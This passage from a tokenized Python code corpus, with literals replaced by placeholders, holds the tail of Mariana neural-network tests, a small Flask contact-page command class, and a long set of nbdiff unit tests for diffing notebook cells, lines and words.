<NUM_LIT:1000> , <NUM_LIT> , <NUM_LIT:6> ) <EOL> model = getModel ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> miniBatchSize = <NUM_LIT:32> <EOL> for epoch in xrange ( <NUM_LIT:100> ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( examples ) , miniBatchSize ) : <EOL> res = model . train ( "<STR_LIT>" , inp = examples [ i : i + miniBatchSize ] , targets = targets [ i : i + miniBatchSize ] ) <EOL> self . assertTrue ( res [ <NUM_LIT:0> ] < <NUM_LIT:0.1> ) <EOL> def test_batch_norm ( self ) : <EOL> import theano , numpy <EOL> def batchnorm ( W , b , data ) : <EOL> return numpy . asarray ( W * ( ( data - numpy . mean ( data ) ) / numpy . std ( data ) ) + b , dtype = theano . config . floatX ) <EOL> data = numpy . random . randn ( <NUM_LIT:1> , <NUM_LIT:100> ) . astype ( theano . config . floatX ) <EOL> inp = ML . Input ( <NUM_LIT:100> , '<STR_LIT>' ) <EOL> bn = ML . 
BatchNormalization ( ) <EOL> model = inp > bn <EOL> m1 = numpy . mean ( model . propagate ( bn , inp = data ) ) <EOL> m2 = numpy . mean ( batchnorm ( bn . getW ( ) , bn . getb ( ) , data ) ) <EOL> epsilon = <NUM_LIT> <EOL> self . assertTrue ( ( m1 - m2 ) < epsilon ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import Mariana . settings as MSET <EOL> MSET . VERBOSE = False <EOL> unittest . main ( ) </s>
<s> from . import BaseCommand <EOL> from flask import render_template <EOL> class ContactUsCommand ( BaseCommand ) : <EOL> def process ( self , request , filename , db_session ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> def newInstance ( ) : <EOL> return ContactUsCommand ( ) </s>
<s> from nbdiff . comparable import CellComparator <EOL> from nbdiff . notebook_diff import ( <EOL> cells_diff , <EOL> words_diff , <EOL> lines_diff , <EOL> diff_modified_items , <EOL> ) <EOL> def test_diff_cells0 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } ] <EOL> result = cells_diff ( A , B , check_modified = False ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells1 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> 
'<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells2 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> 
"<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells3 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:y>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , 
u'<STR_LIT:z>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:w>' ] } <EOL> ] <EOL> result = cells_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells4 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ ] } ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == 
'<STR_LIT>' <EOL> def test_diff_cells5 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells6 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> 
"<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells7 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' 
<EOL> def test_diff_cells8 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines0 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines1 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines2 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' 
<EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_line3 ( ) : <EOL> A = [ '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines4 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines5 ( ) : <EOL> A = [ '<STR_LIT:test>' , '<STR_LIT:U+0020>' ] <EOL> B = [ '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines6 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines7 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' 
<EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines8 ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines9 ( ) : <EOL> A = [ '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines10 ( ) : <EOL> A = [ '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words0 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words1 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT:U+0020>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words2 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ 
<NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words3 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words4 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> 